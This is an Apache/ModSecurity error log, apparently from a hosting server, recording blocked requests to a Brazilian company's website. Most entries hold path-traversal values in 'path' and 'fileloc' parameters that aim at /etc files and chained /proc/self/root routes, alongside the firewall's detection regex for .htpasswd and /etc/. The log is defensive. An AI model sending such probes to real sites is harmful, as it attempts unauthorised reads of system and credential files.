[Fri Mar 20 10:52:31.539143 2026] [:error] [pid 31215:tid 140411716749056] [client 216.73.216.191:45598] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1RHwF0L0L-SsrnPo6NeAAAAsM"]
[Fri Mar 20 10:52:37.759484 2026] [:error] [pid 7893:tid 140411565680384] [client 216.73.216.191:46008] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1RJRCii7xarUs8iHaPMwAAAhU"]
[Fri Mar 20 10:52:42.191874 2026] [:error] [pid 26799:tid 140411616036608] [client 57.141.18.117:46154] [client 57.141.18.117] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1RKta6ubjKNq_cu4b-3QAAA08"]
[Fri Mar 20 10:52:42.508767 2026] [:error] [pid 11167:tid 140411590858496] [client 57.141.18.44:46218] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1RKvHIg5MgXLBnicMaowAAAdI"]
[Fri Mar 20 10:52:48.087174 2026] [:error] [pid 7893:tid 140411632822016] [client 57.141.18.23:46492] [client 57.141.18.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1RMBCii7xarUs8iHaPOgAAAg0"]
[Fri Mar 20 10:53:00.716176 2026] [mime_magic:error] [pid 26799:tid 140411557287680] (70014)End of file found: [client 57.141.18.53:47062] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:53:05.186550 2026] [mime_magic:error] [pid 15826:tid 140411607643904] (70014)End of file found: [client 216.73.216.191:47336] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:53:06.135474 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.243.128:47242] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1RQgF0L0L-SsrnPo6NogAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:53:15.971032 2026] [:error] [pid 21219:tid 140411658000128] [client 216.73.216.191:48060] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1RS_XLqtnMIWvjpaLAXQAAAoo"]
[Fri Mar 20 10:53:19.742110 2026] [:error] [pid 7235:tid 140411540502272] [client 216.73.216.191:48212] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1RTvqxLDW4GITHUkQOdQAAARg"]
[Fri Mar 20 10:53:21.631142 2026] [:error] [pid 26799:tid 140411699963648] [client 216.73.216.191:48370] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1RUda6ubjKNq_cu4b_OAAAA0U"]
[Fri Mar 20 10:53:26.664783 2026] [:error] [pid 7235:tid 140411590858496] [client 216.73.216.191:48658] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1RVfqxLDW4GITHUkQOgAAAARI"]
[Fri Mar 20 10:53:26.665831 2026] [:error] [pid 7893:tid 140411616036608] [client 216.73.216.191:48638] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1RVRCii7xarUs8iHaPWwAAAg8"]
[Fri Mar 20 10:53:26.676180 2026] [:error] [pid 21219:tid 140411565680384] [client 216.73.216.191:48648] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1RVfXLqtnMIWvjpaLAbAAAApU"]
[Fri Mar 20 10:53:29.987533 2026] [:error] [pid 9818:tid 140411699963648] [client 57.141.18.53:48892] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ethertypes"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1RWV1pVZ5mVmJwsFNUOQAAAEU"]
[Fri Mar 20 10:53:34.767972 2026] [:error] [pid 7235:tid 140411632822016] [client 216.73.216.191:49196] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1RXvqxLDW4GITHUkQOkQAAAQ0"]
[Fri Mar 20 10:53:35.587284 2026] [:error] [pid 7235:tid 140411565680384] [client 57.141.18.46:49184] [client 57.141.18.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1RX_qxLDW4GITHUkQOkwAAARU"]
[Fri Mar 20 10:53:40.854554 2026] [:error] [pid 11642:tid 140411616036608] [client 57.141.18.70:49430] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1RZLninkcc-iUj5AqCmAAAA48"]
[Fri Mar 20 10:53:43.995077 2026] [:error] [pid 15826:tid 140411599251200] [client 57.141.18.69:49518] [client 57.141.18.69] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1RZ-oXxyEfFpUF8f-lMQAAAVE"]
[Fri Mar 20 10:53:49.315168 2026] [:error] [pid 7235:tid 140411733534464] [client 74.7.243.128:48658] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1RbfqxLDW4GITHUkQOqgAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:54:16.203007 2026] [:error] [pid 11642:tid 140411733534464] [client 74.7.228.61:34604] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1RiLninkcc-iUj5AqCpgAAA4E"]
[Fri Mar 20 10:54:16.815830 2026] [:error] [pid 10189:tid 140411540502272] [client 216.73.216.191:50618] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt-14"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1RiDJ3M9BSuKP7CAZJ8gAAAJg"]
[Fri Mar 20 10:54:21.875022 2026] [:error] [pid 9818:tid 140411716749056] [client 216.73.216.191:50890] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt 7"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1RjV1pVZ5mVmJwsFNUXAAAAEM"]
[Fri Mar 20 10:54:25.391840 2026] [:error] [pid 7893:tid 140411741927168] [client 57.141.18.115:51050] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1RkBCii7xarUs8iHaPggAAAgA"]
[Fri Mar 20 10:54:27.146043 2026] [:error] [pid 9818:tid 140411565680384] [client 57.141.18.86:51174] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Rk11pVZ5mVmJwsFNUYQAAAFU"]
[Fri Mar 20 10:54:28.431525 2026] [:error] [pid 31215:tid 140411582465792] [client 216.73.216.191:51170] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt-10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1RlAF0L0L-SsrnPo6N2wAAAtM"]
[Fri Mar 20 10:54:35.543195 2026] [:error] [pid 11167:tid 140411548894976] [client 57.141.18.70:51654] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1Rm_HIg5MgXLBnicMbMAAAAdc"]
[Fri Mar 20 10:54:40.864346 2026] [:error] [pid 15826:tid 140411557287680] [client 57.141.18.79:52008] [client 57.141.18.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1RoOoXxyEfFpUF8f-lZwAAAVY"]
[Fri Mar 20 10:54:44.782824 2026] [:error] [pid 9818:tid 140411624429312] [client 216.73.216.191:52176] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1Ro11pVZ5mVmJwsFNUegAAAE4"]
[Fri Mar 20 10:54:44.818629 2026] [:error] [pid 31215:tid 140411574073088] [client 216.73.216.191:52194] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1RowF0L0L-SsrnPo6N8AAAAtQ"]
[Fri Mar 20 10:54:45.365098 2026] [mime_magic:error] [pid 15826:tid 140411725141760] (70014)End of file found: [client 216.73.216.191:52272] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
